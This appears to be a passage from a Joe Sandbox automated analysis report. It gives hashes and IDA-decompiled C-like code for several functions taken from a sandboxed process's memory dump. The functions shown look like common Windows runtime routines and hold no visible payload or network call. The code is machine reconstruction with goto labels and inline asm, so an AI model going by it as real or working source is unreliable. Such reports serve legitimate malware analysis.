                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8c0acadb3c75b73833352219cd14c3dbcbf40416d69e934cdea7b0c312eb569d
                                                                              • Instruction ID: b331fbc1b995141628ac3b5f42f4bd6ad20770d0fd2e322e91ffe686e0e3ca86
                                                                              • Opcode Fuzzy Hash: 8c0acadb3c75b73833352219cd14c3dbcbf40416d69e934cdea7b0c312eb569d
                                                                              • Instruction Fuzzy Hash: 32312632205711DBC761AF69C989B2AFBE4FFC1710F880659E85747245CBB5EA00CB95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A8EC7 Relevance: .1, Instructions: 92COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 93%
                                                                              			E017A8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x185d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E01794E70(0x18586e4, 0x17a9490, 0, 0);
					if( *0x18553e8 > 5 && E017A8F33(0x18553e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x18553e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x18553e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x174bc46;
						_t48 = E017E7B9C(0x18553e8, 0x174bc46, _t67, 0x18553e8, _t70,  &_v140);
					}
				}
				return E017AB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                                              0x017a8ec7
                                                                              0x017a8ed9
                                                                              0x017a8edc
                                                                              0x017a8ee6
                                                                              0x017a8ee9
                                                                              0x017a8eee
                                                                              0x017a8efc
                                                                              0x017a8f08
                                                                              0x017e1349
                                                                              0x017e1353
                                                                              0x017e135d
                                                                              0x017e1366
                                                                              0x017e136f
                                                                              0x017e1375
                                                                              0x017e137c
                                                                              0x017e1385
                                                                              0x017e1390
                                                                              0x017e1391
                                                                              0x017e139c
                                                                              0x017e139d
                                                                              0x017e13a6
                                                                              0x017e13ac
                                                                              0x017e13b2
                                                                              0x017e13b5
                                                                              0x017e13bc
                                                                              0x017e13bf
                                                                              0x017e13c2
                                                                              0x017e13c5
                                                                              0x017e13c8
                                                                              0x017e13cb
                                                                              0x017e13ce
                                                                              0x017e13d1
                                                                              0x017e13d4
                                                                              0x017e13d7
                                                                              0x017e13da
                                                                              0x017e13dd
                                                                              0x017e13e0
                                                                              0x017e13e3
                                                                              0x017e13e6
                                                                              0x017e13e9
                                                                              0x017e13f6
                                                                              0x017e1400
                                                                              0x017e1400
                                                                              0x017a8f08
                                                                              0x017a8f32

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 94bf00f0d0bb6fbc9ecf96cdb7952af00966f388b9a71bb809c81c5234cbb200
                                                                              • Instruction ID: a4884bf1e7068c7dba8e5a55bf0a87ef3707fb61a748a0abd62badc3a33de1b8
                                                                              • Opcode Fuzzy Hash: 94bf00f0d0bb6fbc9ecf96cdb7952af00966f388b9a71bb809c81c5234cbb200
                                                                              • Instruction Fuzzy Hash: 0D41A1B1D003189FDB24CFAAD981AADFBF8FB48310F5041AEE509A7200E7745A84CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0179E730 Relevance: .1, Instructions: 89COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 74%
                                                                              			E0179E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E017A9670() < 0) {
					L017BDF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x1857b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L01784620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0179E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                                              0x0179e730
                                                                              0x0179e736
                                                                              0x0179e738
                                                                              0x0179e73d
                                                                              0x0179e73e
                                                                              0x0179e740
                                                                              0x0179e749
                                                                              0x0179e765
                                                                              0x0179e76a
                                                                              0x0179e76b
                                                                              0x0179e76c
                                                                              0x0179e76d
                                                                              0x0179e76e
                                                                              0x0179e76f
                                                                              0x0179e775
                                                                              0x0179e777
                                                                              0x0179e77e
                                                                              0x017db675
                                                                              0x0179e784
                                                                              0x0179e784
                                                                              0x0179e789
                                                                              0x0179e7a8
                                                                              0x0179e7ac
                                                                              0x0179e807
                                                                              0x0179e7ae
                                                                              0x0179e7ae
                                                                              0x0179e7b1
                                                                              0x0179e7b4
                                                                              0x0179e7b9
                                                                              0x0179e7c0
                                                                              0x0179e7c4
                                                                              0x0179e7ca
                                                                              0x0179e7cc
                                                                              0x00000000
                                                                              0x0179e7d3
                                                                              0x0179e7d6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0179e7ff
                                                                              0x0179e802
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0179e7f9
                                                                              0x0179e7fc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0179e7f3
                                                                              0x0179e7f6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0179e7ed
                                                                              0x0179e7f0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0179e7e7
                                                                              0x0179e7ea
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017db685
                                                                              0x017db688
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017db682
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0179e7cc
                                                                              0x0179e7d9
                                                                              0x0179e7dc
                                                                              0x0179e7de
                                                                              0x0179e7de
                                                                              0x0179e7ac
                                                                              0x0179e7e4
                                                                              0x0179e74b
                                                                              0x0179e751
                                                                              0x0179e759
                                                                              0x0179e761
                                                                              0x0179e761

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0ad9c4cd0c4d43bdfa0e4d6f547b39452d922ff7d66d8e014a238a1689999846
                                                                              • Instruction ID: 0bc2f9ed80e08f5a4eaed37c80ad8a117584d78f774f817555937ec3321b15c9
                                                                              • Opcode Fuzzy Hash: 0ad9c4cd0c4d43bdfa0e4d6f547b39452d922ff7d66d8e014a238a1689999846
                                                                              • Instruction Fuzzy Hash: 02318E75A14249EFDB04CF58D841F9AFBE4FB09314F148256F904CB341EA31E984CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0179BC2C Relevance: .1, Instructions: 88COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 67%
                                                                              			E0179BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x1856100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E01782280(0xd, 0x79af1a0);
				_t41 =  *0x18560f8; // 0x0
				if(_t41 != 0) {
					 *0x18560f8 =  *_t41;
					 *0x18560fc =  *0x18560fc + 0xffff;
				}
				E0177FFB0(_t41, 0x800, 0x79af1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x18560f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L01784620(0x1856100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x1856100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                                              0x0179bc36
                                                                              0x0179bc42
                                                                              0x0179bc45
                                                                              0x0179bc4a
                                                                              0x0179bd35
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0179bc50
                                                                              0x0179bc50
                                                                              0x0179bc58
                                                                              0x0179bc5a
                                                                              0x0179bc60
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017da4f2
                                                                              0x017da4f6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017da4fc
                                                                              0x0179bc79
                                                                              0x0179bc7e
                                                                              0x0179bc86
                                                                              0x0179bd16
                                                                              0x0179bd20
                                                                              0x0179bd20
                                                                              0x0179bc8d
                                                                              0x0179bc94
                                                                              0x0179bcbd
                                                                              0x0179bcca
                                                                              0x0179bccb
                                                                              0x0179bccc
                                                                              0x0179bccd
                                                                              0x0179bcce
                                                                              0x0179bcd4
                                                                              0x0179bcea
                                                                              0x0179bcee
                                                                              0x0179bcf2
                                                                              0x0179bd00
                                                                              0x0179bd04
                                                                              0x00000000
                                                                              0x0179bc96
                                                                              0x0179bcab
                                                                              0x0179bcaf
                                                                              0x0179bd2c
                                                                              0x0179bd2c
                                                                              0x0179bd09
                                                                              0x00000000
                                                                              0x0179bd09
                                                                              0x0179bcb1
                                                                              0x0179bcb5
                                                                              0x0179bcbb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0179bcbb

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 13689fe2f0039ad39c20b81bf78b0e00da0089e2465e038ed5f1ab41fabdb5db
                                                                              • Instruction ID: 82463b9226e38aac7106916594993a42954f0e2e4c9f8f8a2e27650505240625
                                                                              • Opcode Fuzzy Hash: 13689fe2f0039ad39c20b81bf78b0e00da0089e2465e038ed5f1ab41fabdb5db
                                                                              • Instruction Fuzzy Hash: 9331F2326006569BDF51DF68E480BA6B7B4FF19321F540079ED44EB206FB78DA89CB81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01769100 Relevance: .1, Instructions: 87COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 76%
                                                                              			E01769100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x183f6e8);
				E017BD0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E018388F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E017BD130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x18586c0; // 0x13007b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x18586b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E01782280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E018388F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E017AAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x185b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x18584c0;
										if(_t69 >=  *0x18584c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E01839063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0176922A(_t82);
							_t53 = E01787D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E01838B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x18586c0; // 0x13007b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x18586b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x18586bc;
										_t72 = 0x18586b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E01769240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x18586c4;
									_t72 = 0x18586c0;
									L18:
									E01799B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                                              0x01769100
                                                                              0x01769100
                                                                              0x01769100
                                                                              0x01769100
                                                                              0x01769102
                                                                              0x01769107
                                                                              0x0176910c
                                                                              0x01769110
                                                                              0x01769115
                                                                              0x01769136
                                                                              0x01769143
                                                                              0x017c37e4
                                                                              0x017c37e4
                                                                              0x01769149
                                                                              0x0176914e
                                                                              0x0176914e
                                                                              0x01769117
                                                                              0x0176911d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0176911f
                                                                              0x01769125
                                                                              0x00000000
                                                                              0x01769151
                                                                              0x01769158
                                                                              0x0176915d
                                                                              0x01769161
                                                                              0x01769168
                                                                              0x017c3715
                                                                              0x00000000
                                                                              0x0176916e
                                                                              0x0176916e
                                                                              0x01769175
                                                                              0x01769177
                                                                              0x0176917e
                                                                              0x0176917f
                                                                              0x01769182
                                                                              0x01769182
                                                                              0x01769187
                                                                              0x01769187
                                                                              0x0176918a
                                                                              0x0176918d
                                                                              0x0176918f
                                                                              0x01769192
                                                                              0x01769195
                                                                              0x01769198
                                                                              0x01769198
                                                                              0x01769198
                                                                              0x0176919a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c371f
                                                                              0x017c3721
                                                                              0x017c3727
                                                                              0x017c372f
                                                                              0x017c3733
                                                                              0x017c3735
                                                                              0x017c3738
                                                                              0x017c373b
                                                                              0x017c373d
                                                                              0x017c3740
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c3746
                                                                              0x017c3749
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c374f
                                                                              0x017c3751
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c3757
                                                                              0x017c3759
                                                                              0x017c375c
                                                                              0x017c375c
                                                                              0x017c375e
                                                                              0x017c375e
                                                                              0x017c3761
                                                                              0x017c3764
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c3766
                                                                              0x017c3768
                                                                              0x017c37a3
                                                                              0x017c37a3
                                                                              0x017c37a5
                                                                              0x017c37a7
                                                                              0x017c37ad
                                                                              0x017c37b0
                                                                              0x017c37b2
                                                                              0x017c37bc
                                                                              0x017c37c2
                                                                              0x017c37c2
                                                                              0x017c37b2
                                                                              0x01769187
                                                                              0x01769187
                                                                              0x0176918a
                                                                              0x0176918d
                                                                              0x0176918f
                                                                              0x01769192
                                                                              0x01769195
                                                                              0x00000000
                                                                              0x01769195
                                                                              0x00000000
                                                                              0x01769187
                                                                              0x017c376a
                                                                              0x017c376a
                                                                              0x017c376c
                                                                              0x017c376c
                                                                              0x017c376f
                                                                              0x017c3775
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c3777
                                                                              0x017c3779
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c3782
                                                                              0x017c3787
                                                                              0x017c3789
                                                                              0x017c3790
                                                                              0x017c3790
                                                                              0x017c378b
                                                                              0x017c378b
                                                                              0x017c378b
                                                                              0x017c3792
                                                                              0x017c3795
                                                                              0x017c3795
                                                                              0x017c3798
                                                                              0x017c3798
                                                                              0x017c379b
                                                                              0x017c379b
                                                                              0x017691a3
                                                                              0x017691a9
                                                                              0x017691b0
                                                                              0x017691b4
                                                                              0x017691b4
                                                                              0x017691bb
                                                                              0x017691c0
                                                                              0x017691c5
                                                                              0x017691c7
                                                                              0x017c37da
                                                                              0x017691cd
                                                                              0x017691cd
                                                                              0x017691cd
                                                                              0x017691d2
                                                                              0x017691d5
                                                                              0x01769239
                                                                              0x01769239
                                                                              0x017691d7
                                                                              0x017691db
                                                                              0x017691e1
                                                                              0x017691e7
                                                                              0x017691fd
                                                                              0x01769203
                                                                              0x0176921e
                                                                              0x01769223
                                                                              0x00000000
                                                                              0x01769223
                                                                              0x01769205
                                                                              0x01769208
                                                                              0x0176920c
                                                                              0x01769214
                                                                              0x01769214
                                                                              0x017691e9
                                                                              0x017691e9
                                                                              0x017691ee
                                                                              0x017691f3
                                                                              0x017691f3
                                                                              0x017691f3
                                                                              0x017691e7
                                                                              0x00000000
                                                                              0x017691db
                                                                              0x01769187
                                                                              0x01769168

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 01e44909cd3b3fc5c271ebbff23f30e806e75aeb6e4d69bd8268c47f95646b2d
                                                                              • Instruction ID: 2dddcb6342d70ee21d2a5960e3ba008702b029286153738f52b2388e94b38ecb
                                                                              • Opcode Fuzzy Hash: 01e44909cd3b3fc5c271ebbff23f30e806e75aeb6e4d69bd8268c47f95646b2d
                                                                              • Instruction Fuzzy Hash: A431DB75A05245DFDB29DF6CC58C7ACFBF5BB49318F28815ECA0467241D334A984CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01791DB5 Relevance: .1, Instructions: 87COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 60%
                                                                              			E01791DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0178F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L01784620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0178F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                                              0x01791dc2
                                                                              0x01791dc5
                                                                              0x01791dc7
                                                                              0x01791dcc
                                                                              0x01791dce
                                                                              0x01791dd6
                                                                              0x01791ddf
                                                                              0x01791de0
                                                                              0x01791de1
                                                                              0x01791de5
                                                                              0x01791de8
                                                                              0x01791def
                                                                              0x01791df0
                                                                              0x01791df6
                                                                              0x01791df7
                                                                              0x01791dfe
                                                                              0x01791e1a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01791e0b
                                                                              0x01791e12
                                                                              0x01791e12
                                                                              0x01791e00
                                                                              0x01791e00
                                                                              0x01791e05
                                                                              0x01791e1e
                                                                              0x01791e23
                                                                              0x017d570f
                                                                              0x017d5713
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d5719
                                                                              0x017d5719
                                                                              0x01791e2c
                                                                              0x01791e2d
                                                                              0x01791e2e
                                                                              0x01791e2f
                                                                              0x01791e31
                                                                              0x01791e32
                                                                              0x01791e35
                                                                              0x01791e3d
                                                                              0x017d5723
                                                                              0x017d573d
                                                                              0x017d573d
                                                                              0x00000000
                                                                              0x017d5723
                                                                              0x01791e49
                                                                              0x01791e4e
                                                                              0x01791e4e
                                                                              0x01791e09
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                              • Instruction ID: 079cb77b35c04757c9bb7fca014e3c2b3b793d0f3dd600f1ca98c8fd597cb9b9
                                                                              • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                              • Instruction Fuzzy Hash: 4621F17260011AFFDB20DF99DC80EABFBBDEF89661F514095FA0597210D234AE11CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01780050 Relevance: .1, Instructions: 81COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 53%
                                                                              			E01780050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
